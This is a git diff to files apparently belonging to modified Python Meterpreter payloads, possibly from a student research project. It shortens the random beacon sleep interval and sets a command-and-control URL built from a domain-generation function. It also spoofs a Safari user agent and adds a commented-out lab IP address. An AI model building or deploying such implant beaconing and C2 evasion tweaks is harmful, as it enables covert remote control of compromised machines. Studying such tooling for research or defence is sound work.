diff --git a/Payloads/http/final-http.py b/Payloads/http/final-http.py
index 766ed69f38c1e645ae8fd6d13ea5966af20e0107..59771aeeb9410df2c7e7001dc0b811ede1693d46 100644
--- a/Payloads/http/final-http.py
+++ b/Payloads/http/final-http.py
@@ -1145,7 +1145,7 @@ class HttpTransport(Transport):
                 # server has nothing for us but this is fine so update the communication time and wait
                 self.communication_last = time.time()
 
-				time.sleep(float(random.randrange(0,10000)) / 1000)
+				time.sleep(float(random.randrange(0,8000)) / 1000)
             
             # ************************ VARIABLE SIZES tfg**************************************
             
diff --git a/Payloads/https/final-https.py b/Payloads/https/final-https.py
index acd04c6782e3f57d93cace53cd1580c1990407b4..e0b421ba29005adcae23a974a51cbac30275357a 100644
--- a/Payloads/https/final-https.py
+++ b/Payloads/https/final-https.py
@@ -134,7 +134,7 @@ def generate_domain():
 
 
 HTTP_CONNECTION_URL = 'https://'+generate_domain()+'/KTRhg_yaxFhjGXYNAWP4iwOxsNqPIoApEWI/'
-#HTTP_CONNECTION_URL = 'https://192.168.2.14/KTRhg_yaxFhjGXYNAWP4iwOxsNqPIoApEWI/'
+#HTTP_CONNECTION_URL = 'https://192.168.2.14/KTRhg_yaxFhjGXYNAWP4iwOxsNqPIoApEWI/'  
 HTTP_PROXY = None
 HTTP_USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15'
 HTTP_COOKIE = None
@@ -1146,7 +1146,7 @@ class HttpTransport(Transport):
                 # server has nothing for us but this is fine so update the communication time and wait
                 self.communication_last = time.time()
             
-            time.sleep(float(random.randrange(0,10000)) / 1000)
+            time.sleep(float(random.randrange(0,8000)) / 1000)
             
             # ************************ VARIABLE SIZES tfg**************************************
             
@@ -1485,7 +1485,8 @@ class PythonMeterpreter(object):
                     
            
             self.transport.url = 'https://'+generate_domain()+'/KTRhg_yaxFhjGXYNAWP4iwOxsNqPIoApEWI/'  
-           
+            #self.transport.url = 'https://192.168.2.14/KTRhg_yaxFhjGXYNAWP4iwOxsNqPIoApEWI/'  
+				
             
             # ************************* *************************************** **************************************